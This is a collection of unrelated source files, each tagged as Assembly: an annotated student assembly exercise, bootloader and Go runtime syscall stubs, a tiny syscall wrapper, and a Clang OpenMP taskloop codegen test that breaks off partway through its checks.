0020 LOOP: MOV R3, R1 12310000
0024 CMP R3, R5 10350000
0028 JGT LOOP 23FFFFF4 23FFFFF4 (沒有絕對版)
002C RET 2C000000
0030 C: WORD 37 00000025
0034 D: BYTE 25 19
0035 LBR R1, R3+20 06130014
0039 LDI R8, 100 08800064
003D ST R5, C 01500030 015FFFEF
0041 STB R13, A 03D00010 03DFFFCB
0045 RET 2C000000
2 補數的計算過程
-12 = -C 001100 => 110011 + 1 => 1111110100 => FFFFF4
-11 00010001 => 11101110 + 1 => 11101111 => FFEF
-35 00110101 => 11001010 + 1 => 11001011 => FFCB | {
"language": "Assembly"
} |
/* SPDX-License-Identifier: GPL-2.0+ */
/*
* Copyright (C) 2011 Andes Technology Corporation
* Macpaul Lin, Andes Technology Corporation <macpaul@andestech.com>
*/
#include <asm/arch-ag101/ag101.h>
#include <linux/linkage.h>
.text
#ifndef CONFIG_SKIP_TRUNOFF_WATCHDOG
ENTRY(turnoff_watchdog)
#error "AE3XX not support wdt yet"
ENDPROC(turnoff_watchdog)
#endif
| {
"language": "Assembly"
} |
// Copyright 2012 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System call support for ARM, FreeBSD
//
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
TEXT ·Syscall(SB),NOSPLIT,$0-28
B syscall·Syscall(SB)
TEXT ·Syscall6(SB),NOSPLIT,$0-40
B syscall·Syscall6(SB)
TEXT ·Syscall9(SB),NOSPLIT,$0-52
B syscall·Syscall9(SB)
TEXT ·RawSyscall(SB),NOSPLIT,$0-28
B syscall·RawSyscall(SB)
TEXT ·RawSyscall6(SB),NOSPLIT,$0-40
B syscall·RawSyscall6(SB)
| {
"language": "Assembly"
} |
#include "sys.h"
.define _times
_times:
mov 2(sp),0f+2
sys indir; .data2 0f
rts pc
.sect .data
0:
sys times
.data2 0
| {
"language": "Assembly"
} |
// RUN: %clang_cc1 -verify -fopenmp -x c++ -triple x86_64-apple-darwin10 -emit-llvm %s -o - | FileCheck %s
// RUN: %clang_cc1 -fopenmp -x c++ -std=c++11 -triple x86_64-apple-darwin10 -emit-pch -o %t %s
// RUN: %clang_cc1 -fopenmp -x c++ -triple x86_64-apple-darwin10 -std=c++11 -include-pch %t -verify %s -emit-llvm -o - | FileCheck %s
// RUN: %clang_cc1 -verify -fopenmp -x c++ -std=c++11 -DLAMBDA -triple x86_64-apple-darwin10 -emit-llvm %s -o - | FileCheck -check-prefix=LAMBDA %s
// RUN: %clang_cc1 -verify -fopenmp -x c++ -fblocks -DBLOCKS -triple x86_64-apple-darwin10 -emit-llvm %s -o - | FileCheck -check-prefix=BLOCKS %s
// RUN: %clang_cc1 -verify -fopenmp -x c++ -std=c++11 -DARRAY -triple x86_64-apple-darwin10 -emit-llvm %s -o - | FileCheck -check-prefix=ARRAY %s
// RUN: %clang_cc1 -verify -fopenmp-simd -x c++ -triple x86_64-apple-darwin10 -emit-llvm %s -o - | FileCheck --check-prefix SIMD-ONLY0 %s
// RUN: %clang_cc1 -fopenmp-simd -x c++ -std=c++11 -triple x86_64-apple-darwin10 -emit-pch -o %t %s
// RUN: %clang_cc1 -fopenmp-simd -x c++ -triple x86_64-apple-darwin10 -std=c++11 -include-pch %t -verify %s -emit-llvm -o - | FileCheck --check-prefix SIMD-ONLY0 %s
// RUN: %clang_cc1 -verify -fopenmp-simd -x c++ -std=c++11 -DLAMBDA -triple x86_64-apple-darwin10 -emit-llvm %s -o - | FileCheck --check-prefix SIMD-ONLY0 %s
// RUN: %clang_cc1 -verify -fopenmp-simd -x c++ -fblocks -DBLOCKS -triple x86_64-apple-darwin10 -emit-llvm %s -o - | FileCheck --check-prefix SIMD-ONLY0 %s
// RUN: %clang_cc1 -verify -fopenmp-simd -x c++ -std=c++11 -DARRAY -triple x86_64-apple-darwin10 -emit-llvm %s -o - | FileCheck --check-prefix SIMD-ONLY0 %s
// SIMD-ONLY0-NOT: {{__kmpc|__tgt}}
// expected-no-diagnostics
// It doesn't pass on win32. Investigating.
// REQUIRES: shell
#ifndef ARRAY
#ifndef HEADER
#define HEADER
template <class T>
struct S {
T f;
S(T a) : f(a) {}
S() : f() {}
operator T() { return T(); }
~S() {}
};
volatile double g;
// CHECK-DAG: [[KMP_TASK_T_TY:%.+]] = type { i8*, i32 (i32, i8*)*, i32, %union{{.+}}, %union{{.+}}, i64, i64, i64, i32, i8* }
// CHECK-DAG: [[S_DOUBLE_TY:%.+]] = type { double }
// CHECK-DAG: [[CAP_MAIN_TY:%.+]] = type { i8 }
// CHECK-DAG: [[PRIVATES_MAIN_TY:%.+]] = type {{.?}}{ [2 x [[S_DOUBLE_TY]]], [[S_DOUBLE_TY]], i32, [2 x i32]
// CHECK-DAG: [[KMP_TASK_MAIN_TY:%.+]] = type { [[KMP_TASK_T_TY]], [[PRIVATES_MAIN_TY]] }
// CHECK-DAG: [[S_INT_TY:%.+]] = type { i32 }
// CHECK-DAG: [[CAP_TMAIN_TY:%.+]] = type { i8 }
// CHECK-DAG: [[PRIVATES_TMAIN_TY:%.+]] = type { i32, [2 x i32], [2 x [[S_INT_TY]]], [[S_INT_TY]], [104 x i8] }
// CHECK-DAG: [[KMP_TASK_TMAIN_TY:%.+]] = type { [[KMP_TASK_T_TY]], [{{[0-9]+}} x i8], [[PRIVATES_TMAIN_TY]] }
template <typename T>
T tmain() {
S<T> test;
T t_var __attribute__((aligned(128))) = T();
T vec[] = {1, 2};
S<T> s_arr[] = {1, 2};
S<T> var(3);
#pragma omp taskloop simd private(t_var, vec, s_arr, s_arr, var, var)
for (int i = 0; i < 10; ++i) {
vec[0] = t_var;
s_arr[0] = var;
}
return T();
}
int main() {
static int sivar;
#ifdef LAMBDA
// LAMBDA: [[G:@.+]] = global double
// LAMBDA-LABEL: @main
// LAMBDA: call{{( x86_thiscallcc)?}} void [[OUTER_LAMBDA:@.+]](
[&]() {
// LAMBDA: define{{.*}} internal{{.*}} void [[OUTER_LAMBDA]](
// LAMBDA: [[RES:%.+]] = call i8* @__kmpc_omp_task_alloc(%{{[^ ]+}} @{{[^,]+}}, i32 %{{[^,]+}}, i32 1, i64 96, i64 1, i32 (i32, i8*)* bitcast (i32 (i32, %{{[^*]+}}*)* [[TASK_ENTRY:@[^ ]+]] to i32 (i32, i8*)*))
// LAMBDA: [[PRIVATES:%.+]] = getelementptr inbounds %{{.+}}, %{{.+}}* %{{.+}}, i{{.+}} 0, i{{.+}} 1
// LAMBDA: call void @__kmpc_taskloop(%{{.+}}* @{{.+}}, i32 %{{.+}}, i8* [[RES]], i32 1, i64* %{{.+}}, i64* %{{.+}}, i64 %{{.+}}, i32 0, i32 0, i64 0, i8* null)
// LAMBDA: ret
#pragma omp taskloop simd private(g, sivar)
for (int i = 0; i < 10; ++i) {
// LAMBDA: define {{.+}} void [[INNER_LAMBDA:@.+]](%{{.+}}* [[ARG_PTR:%.+]])
// LAMBDA: store %{{.+}}* [[ARG_PTR]], %{{.+}}** [[ARG_PTR_REF:%.+]],
// LAMBDA: [[ARG_PTR:%.+]] = load %{{.+}}*, %{{.+}}** [[ARG_PTR_REF]]
// LAMBDA: [[G_PTR_REF:%.+]] = getelementptr inbounds %{{.+}}, %{{.+}}* [[ARG_PTR]], i{{[0-9]+}} 0, i{{[0-9]+}} 0
// LAMBDA: [[G_REF:%.+]] = load double*, double** [[G_PTR_REF]]
// LAMBDA: store double 2.0{{.+}}, double* [[G_REF]]
// LAMBDA: [[SIVAR_PTR_REF:%.+]] = getelementptr inbounds %{{.+}}, %{{.+}}* [[ARG_PTR]], i{{[0-9]+}} 0, i{{[0-9]+}} 1
// LAMBDA: [[SIVAR_REF:%.+]] = load i{{[0-9]+}}*, i{{[0-9]+}}** [[SIVAR_PTR_REF]]
// LAMBDA: store i{{[0-9]+}} 3, i{{[0-9]+}}* [[SIVAR_REF]]
// LAMBDA: define internal i32 [[TASK_ENTRY]](i32, %{{.+}}* noalias)
g = 1;
sivar = 2;
// LAMBDA: store double 1.0{{.+}}, double* %{{.+}},
// LAMBDA: store i{{[0-9]+}} 2, i{{[0-9]+}}* %{{.+}},
// LAMBDA: call void [[INNER_LAMBDA]](%
// LAMBDA: ret
[&]() {
g = 2;
sivar = 3;
}();
}
}();
return 0;
#elif defined(BLOCKS)
// BLOCKS: [[G:@.+]] = global double
// BLOCKS-LABEL: @main
// BLOCKS: call void {{%.+}}(i8
^{
// BLOCKS: define{{.*}} internal{{.*}} void {{.+}}(i8*
// BLOCKS: [[RES:%.+]] = call i8* @__kmpc_omp_task_alloc(%{{[^ ]+}} @{{[^,]+}}, i32 %{{[^,]+}}, i32 1, i64 96, i64 1, i32 (i32, i8*)* bitcast (i32 (i32, %{{[^*]+}}*)* [[TASK_ENTRY:@[^ ]+]] to i32 (i32, i8*)*))
// BLOCKS: [[PRIVATES:%.+]] = getelementptr inbounds %{{.+}}, %{{.+}}* %{{.+}}, i{{.+}} 0, i{{.+}} 1
// BLOCKS: call void @__kmpc_taskloop(%{{.+}}* @{{.+}}, i32 %{{.+}}, i8* [[RES]], i32 1, i64* %{{.+}}, i64* %{{.+}}, i64 %{{.+}}, i32 0, i32 0, i64 0, i8* null)
// BLOCKS: ret
#pragma omp taskloop simd private(g, sivar)
for (int i = 0; i < 10; ++i) {
// BLOCKS: define {{.+}} void {{@.+}}(i8*
// BLOCKS-NOT: [[G]]{{[[^:word:]]}}
// BLOCKS: store double 2.0{{.+}}, double*
// BLOCKS-NOT: [[G]]{{[[^:word:]]}}
// BLOCKS-NOT: [[SIVAR]]{{[[^:word:]]}}
// BLOCKS: store i{{[0-9]+}} 4, i{{[0-9]+}}*
// BLOCKS-NOT: [[SIVAR]]{{[[^:word:]]}}
// BLOCKS: ret
// BLOCKS: define internal i32 [[TASK_ENTRY]](i32, %{{.+}}* noalias)
g = 1;
sivar = 3;
// BLOCKS: store double 1.0{{.+}}, double* %{{.+}},
// BLOCKS-NOT: [[G]]{{[[^:word:]]}}
// BLOCKS: store i{{[0-9]+}} 3, i{{[0-9]+}}* %{{.+}},
// BLOCKS-NOT: [[SIVAR]]{{[[^:word:]]}}
// BLOCKS: call void {{%.+}}(i8
^{
g = 2;
sivar = 4;
}();
}
}();
return 0;
#else
S<double> test;
int t_var = 0;
int vec[] = {1, 2};
S<double> s_arr[] = {1, 2};
S<double> var(3);
#pragma omp taskloop simd private(var, t_var, s_arr, vec, s_arr, var, sivar)
for (int i = 0; i < 10; ++i) {
vec[0] = t_var;
s_arr[0] = var;
sivar = 8;
}
#pragma omp task
g+=1;
return tmain<int>();
#endif
}
// CHECK: define i{{[0-9]+}} @main()
// CHECK: [[TEST:%.+]] = alloca [[S_DOUBLE_TY]],
// CHECK: [[T_VAR_ADDR:%.+]] = alloca i32,
// CHECK: [[VEC_ADDR:%.+]] = alloca [2 x i32],
// CHECK: [[S_ARR_ADDR:%.+]] = alloca [2 x [[S_DOUBLE_TY]]],
// CHECK: [[VAR_ADDR:%.+]] = alloca [[S_DOUBLE_TY]],
// CHECK: [[GTID:%.+]] = call i32 @__kmpc_global_thread_num([[LOC:%.+]])
// CHECK: call {{.*}} [[S_DOUBLE_TY_DEF_CONSTR:@.+]]([[S_DOUBLE_TY]]* [[TEST]])
// Do not store original variables in capture struct.
// CHECK-NOT: getelementptr inbounds [[CAP_MAIN_TY]],
// Allocate task.
// Returns struct kmp_task_t {
// [[KMP_TASK_T_TY]] task_data;
// [[KMP_TASK_MAIN_TY]] privates;
// };
// CHECK: [[RES:%.+]] = call i8* @__kmpc_omp_task_alloc([[LOC]], i32 [[GTID]], i32 9, i64 120, i64 1, i32 (i32, i8*)* bitcast (i32 (i32, [[KMP_TASK_MAIN_TY]]*)* [[TASK_ENTRY:@[^ ]+]] to i32 (i32, i8*)*))
// CHECK: [[RES_KMP_TASK:%.+]] = bitcast i8* [[RES]] to [[KMP_TASK_MAIN_TY]]*
// CHECK: [[TASK:%.+]] = getelementptr inbounds [[KMP_TASK_MAIN_TY]], [[KMP_TASK_MAIN_TY]]* [[RES_KMP_TASK]], i{{[0-9]+}} 0, i{{[0-9]+}} 0
// Initialize kmp_task_t->privates with default values (no init for simple types, default constructors for classes).
// Also copy address of private copy to the corresponding shareds reference.
// CHECK: [[PRIVATES:%.+]] = getelementptr inbounds [[KMP_TASK_MAIN_TY]], [[KMP_TASK_MAIN_TY]]* [[RES_KMP_TASK]], i{{[0-9]+}} 0, i{{[0-9]+}} 1
// Constructors for s_arr and var.
// a_arr;
// CHECK: [[PRIVATE_S_ARR_REF:%.+]] = getelementptr inbounds [[PRIVATES_MAIN_TY]], [[PRIVATES_MAIN_TY]]* [[PRIVATES]], i{{[0-9]+}} 0, i{{[0-9]+}} 0
// CHECK: getelementptr inbounds [2 x [[S_DOUBLE_TY]]], [2 x [[S_DOUBLE_TY]]]* [[PRIVATE_S_ARR_REF]], i{{.+}} 0, i{{.+}} 0
// CHECK: getelementptr inbounds [[S_DOUBLE_TY]], [[S_DOUBLE_TY]]* %{{.+}}, i{{.+}} 2
// CHECK: call void [[S_DOUBLE_TY_DEF_CONSTR]]([[S_DOUBLE_TY]]* [[S_ARR_CUR:%.+]])
// CHECK: getelementptr inbounds [[S_DOUBLE_TY]], [[S_DOUBLE_TY]]* [[S_ARR_CUR]], i{{.+}} 1
// CHECK: icmp eq
// CHECK: br i1
// var;
// CHECK: [[PRIVATE_VAR_REF:%.+]] = getelementptr inbounds [[PRIVATES_MAIN_TY]], [[PRIVATES_MAIN_TY]]* [[PRIVATES]], i{{.+}} 0, i{{.+}} 1
// CHECK: call void [[S_DOUBLE_TY_DEF_CONSTR]]([[S_DOUBLE_TY]]* [[PRIVATE_VAR_REF:%.+]])
// Provide pointer to destructor function, which will destroy private variables at the end of the task.
// CHECK: [[DESTRUCTORS_REF:%.+]] = getelementptr inbounds [[KMP_TASK_T_TY]], [[KMP_TASK_T_TY]]* [[TASK]], i{{.+}} 0, i{{.+}} 3
// CHECK: [[DESTRUCTORS_PTR:%.+]] = bitcast %union{{.+}}* [[DESTRUCTORS_REF]] to i32 (i32, i8*)**
// CHECK: store i32 (i32, i8*)* bitcast (i32 (i32, [[KMP_TASK_MAIN_TY]]*)* [[DESTRUCTORS:@.+]] to i32 (i32, i8*)*), i32 (i32, i8*)** [[DESTRUCTORS_PTR]],
// Start task.
// CHECK: call void @__kmpc_taskloop([[LOC]], i32 [[GTID]], i8* [[RES]], i32 1, i64* %{{.+}}, i64* %{{.+}}, i64 %{{.+}}, i32 0, i32 0, i64 0, i8* bitcast (void ([[KMP_TASK_MAIN_TY]]*, [[KMP_TASK_MAIN_TY]]*, i32)* [[MAIN_DUP:@.+]] to i8*))
// CHECK: call i32 @__kmpc_omp_task([[LOC]], i32 [[GTID]], i8*
// CHECK: = call i{{.+}} [[TMAIN_INT:@.+]]()
// No destructors must be called for private copies of s_arr and var.
// CHECK-NOT: getelementptr inbounds [[PRIVATES_MAIN_TY]], [[PRIVATES_MAIN_TY]]* [[PRIVATES]], i{{.+}} 0, i{{.+}} 2
// CHECK-NOT: getelementptr inbounds [[PRIVATES_MAIN_TY]], [[PRIVATES_MAIN_TY]]* [[PRIVATES]], i{{.+}} 0, i{{.+}} 3
// CHECK: call void [[S_DOUBLE_TY_DESTR:@.+]]([[S_DOUBLE_TY]]*
// CHECK-NOT: getelementptr inbounds [[PRIVATES_MAIN_TY]], [[PRIVATES_MAIN_TY]]* [[PRIVATES]], i{{.+}} 0, i{{.+}} 2
// CHECK-NOT: getelementptr inbounds [[PRIVATES_MAIN_TY]], [[PRIVATES_MAIN_TY]]* [[PRIVATES]], i{{.+}} 0, i{{.+}} 3
// CHECK: ret
//
// CHECK: define internal void [[PRIVATES_MAP_FN:@.+]]([[PRIVATES_MAIN_TY]]* noalias, [[S_DOUBLE_TY]]** noalias, i32** noalias, [2 x [[S_DOUBLE_TY]]]** noalias, [2 x i32]** noalias, i32** noalias)
// CHECK: [[PRIVATES:%.+]] = load [[PRIVATES_MAIN_TY]]*, [[PRIVATES_MAIN_TY]]**
// CHECK: [[PRIV_S_VAR:%.+]] = getelementptr inbounds [[PRIVATES_MAIN_TY]], [[PRIVATES_MAIN_TY]]* [[PRIVATES]], i32 0, i32 0
// CHECK: [[ARG3:%.+]] = load [2 x [[S_DOUBLE_TY]]]**, [2 x [[S_DOUBLE_TY]]]*** %{{.+}},
// CHECK: store [2 x [[S_DOUBLE_TY]]]* [[PRIV_S_VAR]], [2 x [[S_DOUBLE_TY]]]** [[ARG3]],
// CHECK: [[PRIV_VAR:%.+]] = getelementptr inbounds [[PRIVATES_MAIN_TY]], [[PRIVATES_MAIN_TY]]* [[PRIVATES]], i32 0, i32 1
// CHECK: [[ARG1:%.+]] = load [[S_DOUBLE_TY]]**, [[S_DOUBLE_TY]]*** {{.+}},
// CHECK: store [[S_DOUBLE_TY]]* [[PRIV_VAR]], [[S_DOUBLE_TY]]** [[ARG1]],
// CHECK: [[PRIV_T_VAR:%.+]] = getelementptr inbounds [[PRIVATES_MAIN_TY]], [[PRIVATES_MAIN_TY]]* [[PRIVATES]], i32 0, i32 2
// CHECK: [[ARG2:%.+]] = load i32**, i32*** %{{.+}},
// CHECK: store i32* [[PRIV_T_VAR]], i32** [[ARG2]],
// CHECK: [[PRIV_VEC:%.+]] = getelementptr inbounds [[PRIVATES_MAIN_TY]], [[PRIVATES_MAIN_TY]]* [[PRIVATES]], i32 0, i32 3
// CHECK: [[ARG4:%.+]] = load [2 x i32]**, [2 x i32]*** %{{.+}},
// CHECK: store [2 x i32]* [[PRIV_VEC]], [2 x i32]** [[ARG4]],
// CHECK: ret void
// CHECK: define internal i32 [[TASK_ENTRY]](i32, [[KMP_TASK_MAIN_TY]]* noalias)
// CHECK: [[PRIV_VAR_ADDR:%.+]] = alloca [[S_DOUBLE_TY]]*,
// CHECK: [[PRIV_T_VAR_ADDR:%.+]] = alloca i32*,
// CHECK: [[PRIV_S_ARR_ADDR:%.+]] = alloca [2 x [[S_DOUBLE_TY]]]*,
// CHECK: [[PRIV_VEC_ADDR:%.+]] = alloca [2 x i32]*,
// CHECK: [[PRIV_SIVAR_ADDR:%.+]] = alloca i32*,
// CHECK: store void (i8*, ...)* bitcast (void ([[PRIVATES_MAIN_TY]]*, [[S_DOUBLE_TY]]**, i32**, [2 x [[S_DOUBLE_TY]]]**, [2 x i32]**, i32**)* [[PRIVATES_MAP_FN]] to void (i8*, ...)*), void (i8*, ...)** [[MAP_FN_ADDR:%.+]],
// CHECK: [[MAP_FN:%.+]] = load void (i8*, ...)*, void (i8*, ...)** [[MAP_FN_ADDR]],
// CHECK: call void (i8*, ...) [[MAP_FN]](i8* %{{.+}}, [[S_DOUBLE_TY]]** [[PRIV_VAR_ADDR]], i32** [[PRIV_T_VAR_ADDR]], [2 x [[S_DOUBLE_TY]]]** [[PRIV_S_ARR_ADDR]], [2 x i32]** [[PRIV_VEC_ADDR]], i32** [[PRIV_SIVAR_ADDR]])
// CHECK: [[PRIV_VAR:%.+]] = load [[S_DOUBLE_TY]]*, [[S_DOUBLE_TY]]** [[PRIV_VAR_ADDR]],
// CHECK: [[PRIV_T_VAR:%.+]] = load i32*, i32** [[PRIV_T_VAR_ADDR]],
// CHECK: [[PRIV_S_ARR:%.+]] = load [2 x [[S_DOUBLE_TY]]]*, [2 x [[S_DOUBLE_TY]]]** [[PRIV_S_ARR_ADDR]],
// CHECK: [[PRIV_VEC:%.+]] = load [2 x i32]*, [2 x i32]** [[PRIV_VEC_ADDR]],
// CHECK: [[PRIV_SIVAR:%.+]] = load i32*, i32** [[PRIV_SIVAR_ADDR]],
// Privates actually are used.
// CHECK-DAG: [[PRIV_VAR]]
// CHECK-DAG: [[PRIV_T_VAR]]
// CHECK-DAG: [[PRIV_S_ARR]]
// CHECK-DAG: [[PRIV_VEC]]
// CHECK_DAG: [[PRIV_SIVAR]]
// CHECK: ret
// CHECK: define internal void [[MAIN_DUP]]([[KMP_TASK_MAIN_TY]]*, [[KMP_TASK_MAIN_TY]]*, i32)
// CHECK: getelementptr inbounds [[KMP_TASK_MAIN_TY]], [[KMP_TASK_MAIN_TY]]* %{{.+}}, i32 0, i32 1
// CHECK: getelementptr inbounds [[PRIVATES_MAIN_TY]], [[PRIVATES_MAIN_TY]]* %{{.+}}, i32 0, i32 0
// CHECK: getelementptr inbounds [2 x [[S_DOUBLE_TY]]], [2 x [[S_DOUBLE_TY]]]* %{{.+}}, i32 0, i32 0
// CHECK: getelementptr inbounds [[S_DOUBLE_TY]], [[S_DOUBLE_TY]]* %{{.+}}, i64 2
// CHECK: br label %
// CHECK: phi [[S_DOUBLE_TY]]*
// CHECK: call {{.*}} [[S_DOUBLE_TY_DEF_CONSTR]]([[S_DOUBLE_TY]]*
// CHECK: getelementptr inbounds [[S_DOUBLE_TY]], [[S_DOUBLE_TY]]* %{{.+}}, i64 1
// CHECK: icmp eq [[S_DOUBLE_TY]]* %
// CHECK: br i1 %
// CHECK: getelementptr inbounds [[PRIVATES_MAIN_TY]], [[PRIVATES_MAIN_TY]]* %{{.+}}, i32 0, i32 1
// CHECK: call {{.*}} [[S_DOUBLE_TY_DEF_CONSTR]]([[S_DOUBLE_TY]]*
// CHECK: ret void
// CHECK: define internal i32 [[DESTRUCTORS]](i32, [[KMP_TASK_MAIN_TY]]* noalias)
// CHECK: [[PRIVATES:%.+]] = getelementptr inbounds [[KMP_TASK_MAIN_TY]], [[KMP_TASK_MAIN_TY]]* [[RES_KMP_TASK:%.+]], i{{[0-9]+}} 0, i{{[0-9]+}} 1
// CHECK: [[PRIVATE_S_ARR_REF:%.+]] = getelementptr inbounds [[PRIVATES_MAIN_TY]], [[PRIVATES_MAIN_TY]]* [[PRIVATES]], i{{.+}} 0, i{{.+}} 0
// CHECK: [[PRIVATE_VAR_REF:%.+]] = getelementptr inbounds [[PRIVATES_MAIN_TY]], [[PRIVATES_MAIN_TY]]* [[PRIVATES]], i{{.+}} 0, i{{.+}} 1
// CHECK: call void [[S_DOUBLE_TY_DESTR]]([[S_DOUBLE_TY]]* [[PRIVATE_VAR_REF]])
// CHECK: getelementptr inbounds [2 x [[S_DOUBLE_TY]]], [2 x [[S_DOUBLE_TY]]]* [[PRIVATE_S_ARR_REF]], i{{.+}} 0, i{{.+}} 0
// CHECK: getelementptr inbounds [[S_DOUBLE_TY]], [[S_DOUBLE_TY]]* %{{.+}}, i{{.+}} 2
// CHECK: [[PRIVATE_S_ARR_ELEM_REF:%.+]] = getelementptr inbounds [[S_DOUBLE_TY]], [[S_DOUBLE_TY]]* %{{.+}}, i{{.+}} -1
// CHECK: call void [[S_DOUBLE_TY_DESTR]]([[S_DOUBLE_TY]]* [[PRIVATE_S_ARR_ELEM_REF]])
// CHECK: icmp eq
// CHECK: br i1
// CHECK: ret i32
// CHECK: define {{.*}} i{{[0-9]+}} [[TMAIN_INT]]()
// CHECK: [[TEST:%.+]] = alloca [[S_INT_TY]],
// CHECK: [[T_VAR_ADDR:%.+]] = alloca i32,
// CHECK: [[VEC_ADDR:%.+]] = alloca [2 x i32],
// CHECK: [[S_ARR_ADDR:%.+]] = alloca [2 x [[S_INT_TY]]],
// CHECK: [[VAR_ADDR:%.+]] = alloca [[S_INT_TY]],
// CHECK: [[GTID:%.+]] = call i32 @__kmpc_global_thread_num([[LOC:%.+]])
// CHECK: call {{.*}} [[S_INT_TY_DEF_CONSTR:@.+]]([[S_INT_TY]]* [[TEST]])
// Do not store original variables in capture struct.
// CHECK-NOT: getelementptr inbounds [[CAP_TMAIN_TY]],
// Allocate task.
// Returns struct kmp_task_t {
// [[KMP_TASK_T_TY]] task_data;
// [[KMP_TASK_TMAIN_TY]] privates;
// };
// CHECK: [[RES:%.+]] = call i8* @__kmpc_omp_task_alloc([[LOC]], i32 [[GTID]], i32 9, i64 256, i64 1, i32 (i32, i8*)* bitcast (i32 (i32, [[KMP_TASK_TMAIN_TY]]*)* [[TASK_ENTRY:@[^ ]+]] to i32 (i32, i8*)*))
// CHECK: [[RES_KMP_TASK:%.+]] = bitcast i8* [[RES]] to [[KMP_TASK_TMAIN_TY]]*
// CHECK: [[TASK:%.+]] = getelementptr inbounds [[KMP_TASK_TMAIN_TY]], [[KMP_TASK_TMAIN_TY]]* [[RES_KMP_TASK]], i{{[0-9]+}} 0, i{{[0-9]+}} 0
// Initialize kmp_task_t->privates with default values (no init for simple types, default constructors for classes).
// CHECK: [[PRIVATES:%.+]] = getelementptr inbounds [[KMP_TASK_TMAIN_TY]], [[KMP_TASK_TMAIN_TY]]* [[RES_KMP_TASK]], i{{[0-9]+}} 0, i{{[0-9]+}} 2
// Constructors for s_arr and var.
// a_arr;
// CHECK: [[PRIVATE_S_ARR_REF:%.+]] = getelementptr inbounds [[PRIVATES_TMAIN_TY]], [[PRIVATES_TMAIN_TY]]* [[PRIVATES]], i{{[0-9]+}} 0, i{{[0-9]+}} 2
// CHECK: getelementptr inbounds [2 x [[S_INT_TY]]], [2 x [[S_INT_TY]]]* [[PRIVATE_S_ARR_REF]], i{{.+}} 0, i{{.+}} 0
// CHECK: getelementptr inbounds [[S_INT_TY]], [[S_INT_TY]]* %{{.+}}, i{{.+}} 2
// CHECK: call void [[S_INT_TY_DEF_CONSTR]]([[S_INT_TY]]* [[S_ARR_CUR:%.+]])
// CHECK: getelementptr inbounds [[S_INT_TY]], [[S_INT_TY]]* [[S_ARR_CUR]], i{{.+}} 1
// CHECK: icmp eq
// CHECK: br i1
// var;
// CHECK: [[PRIVATE_VAR_REF:%.+]] = getelementptr inbounds [[PRIVATES_TMAIN_TY]], [[PRIVATES_TMAIN_TY]]* [[PRIVATES]], i{{.+}} 0, i{{.+}} 3
// CHECK: call void [[S_INT_TY_DEF_CONSTR]]([[S_INT_TY]]* [[PRIVATE_VAR_REF:%.+]])
// Provide pointer to destructor function, which will destroy private variables at the end of the task.
// CHECK: [[DESTRUCTORS_REF:%.+]] = getelementptr inbounds [[KMP_TASK_T_TY]], [[KMP_TASK_T_TY]]* [[TASK]], i{{.+}} 0, i{{.+}} 3
// CHECK: [[DESTRUCTORS_PTR:%.+]] = bitcast %union{{.+}}* [[DESTRUCTORS_REF]] to i32 (i32, i8*)**
// CHECK: store i32 (i32, i8*)* bitcast (i32 (i32, [[KMP_TASK_TMAIN_TY]]*)* [[DESTRUCTORS:@.+]] to i32 (i32, i8*)*), i32 (i32, i8*)** [[DESTRUCTORS_PTR]],
// Start task.
// CHECK: call void @__kmpc_taskloop([[LOC]], i32 [[GTID]], i8* [[RES]], i32 1, i64* %{{.+}}, i64* %{{.+}}, i64 %{{.+}}, i32 0, i32 0, i64 0, i8* bitcast (void ([[KMP_TASK_TMAIN_TY]]*, [[KMP_TASK_TMAIN_TY]]*, i32)* [[TMAIN_DUP:@.+]] to i8*))
// No destructors must be called for private copies of s_arr and var.
// CHECK-NOT: getelementptr inbounds [[PRIVATES_TMAIN_TY]], [[PRIVATES_TMAIN_TY]]* [[PRIVATES]], i{{.+}} 0, i{{.+}} 2
// CHECK-NOT: getelementptr inbounds [[PRIVATES_TMAIN_TY]], [[PRIVATES_TMAIN_TY]]* [[PRIVATES]], i{{.+}} 0, i{{.+}} 3
// CHECK: call void [[S_INT_TY_DESTR:@.+]]([[S_INT_TY]]*
// CHECK-NOT: getelementptr inbounds [[PRIVATES_TMAIN_TY]], [[PRIVATES_TMAIN_TY]]* [[PRIVATES]], i{{.+}} 0, i{{.+}} 2
// CHECK-NOT: getelementptr inbounds [[PRIVATES_TMAIN_TY]], [[PRIVATES_TMAIN_TY]]* [[PRIVATES]], i{{.+}} 0, i{{.+}} 3
// CHECK: ret
//
// CHECK: define internal void [[PRIVATES_MAP_FN:@.+]]([[PRIVATES_TMAIN_TY]]* noalias, i32** noalias, [2 x i32]** noalias, [2 x [[S_INT_TY]]]** noalias, [[S_INT_TY]]** noalias)
// CHECK: [[PRIVATES:%.+]] = load [[PRIVATES_TMAIN_TY]]*, [[PRIVATES_TMAIN_TY]]**
// CHECK: [[PRIV_T_VAR:%.+]] = getelementptr inbounds [[PRIVATES_TMAIN_TY]], [[PRIVATES_TMAIN_TY]]* [[PRIVATES]], i32 0, i32 0
// CHECK: [[ARG1:%.+]] = load i32**, i32*** %{{.+}},
// CHECK: store i32* [[PRIV_T_VAR]], i32** [[ARG1]],
// CHECK: [[PRIV_VEC:%.+]] = getelementptr inbounds [[PRIVATES_TMAIN_TY]], [[PRIVATES_TMAIN_TY]]* [[PRIVATES]], i32 0, i32 1
// CHECK: [[ARG2:%.+]] = load [2 x i32]**, [2 x i32]*** %{{.+}},
// CHECK: store [2 x i32]* [[PRIV_VEC]], [2 x i32]** [[ARG2]],
// CHECK: [[PRIV_S_VAR:%.+]] = getelementptr inbounds [[PRIVATES_TMAIN_TY]], [[PRIVATES_TMAIN_TY]]* [[PRIVATES]], i32 0, i32 2
// CHECK: [[ARG3:%.+]] = load [2 x [[S_INT_TY]]]**, [2 x [[S_INT_TY]]]*** %{{.+}},
// CHECK: store [2 x [[S_INT_TY]]]* [[PRIV_S_VAR]], [2 x [[S_INT_TY]]]** [[ARG3]],
// CHECK: [[PRIV_VAR:%.+]] = getelementptr inbounds [[PRIVATES_TMAIN_TY]], [[PRIVATES_TMAIN_TY]]* [[PRIVATES]], i32 0, i32 3
// CHECK: [[ARG4:%.+]] = load [[S_INT_TY]]**, [[S_INT_TY]]*** {{.+}},
// CHECK: store [[S_INT_TY]]* [[PRIV_VAR]], [[S_INT_TY]]** [[ARG4]],
// CHECK: ret void
// CHECK: define internal i32 [[TASK_ENTRY]](i32, [[KMP_TASK_TMAIN_TY]]* noalias)
// CHECK: alloca i32*,
